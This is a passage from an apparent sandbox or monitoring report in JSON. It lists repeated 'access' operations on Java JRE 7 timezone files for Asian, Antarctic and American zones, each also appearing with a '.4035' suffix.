"c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Sakhalin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\sakhalin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Shanghai", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\shanghai", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Singapore", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\singapore", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vladivostok", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vladivostok", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yakutsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yakutsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yekaterinburg", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yekaterinburg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Casey", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\casey", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Macquarie", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\macquarie", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Mawson", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mawson", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Troll.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\troll.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Troll", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\troll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan.4035", "hashes": [], "norm_filename": "c:\\program files 